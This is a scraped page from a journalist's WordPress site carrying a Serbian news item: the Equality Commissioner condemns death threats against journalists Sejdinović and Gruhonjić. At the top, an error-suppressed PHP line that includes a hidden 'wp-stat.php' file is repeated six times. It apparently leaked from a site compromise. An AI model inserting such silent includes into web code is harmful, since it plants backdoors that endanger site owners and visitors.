@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); Poverenica osudila pretnje smrću Sejdinoviću i Gruhonjiću – Nedim Sejdinović

Poverenica osudila pretnje smrću Sejdinoviću i Gruhonjiću

Poverenica za zaštitu ravnopravnosti Brankica Janković osudila je danas anonimne pretnje smrću koje su upućene novinarima Nedimu Sejdinoviću i Dinku Gruhonjiću i njihovim porodicama.

Kako je objavljeno na portalu Poverenice, te pretnje predstavljaju i težak oblik diskriminacije kojim se izaziva rasna, nacionalna, i verska netrpeljivost i Poverenica očekuje da će nadležni organi hitno reagovati.

“Poverenica Janković upozorava javnost i na ostale pretnje i izjave sa elementima govora mržnje upućene putem socijalnih i društvenih mreža novinarima i novinarkama u prethodnom periodu”, dodaje se u saopštenju.

Janković je ocenila i da su pretnje i govor mržnje nedopustivi u zemlji koja gradi tolerantno i demokratsko društvo, a da počinioce treba oštro sankcionisati.

(Autonomija)

Foto: „www.mc.rs“

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.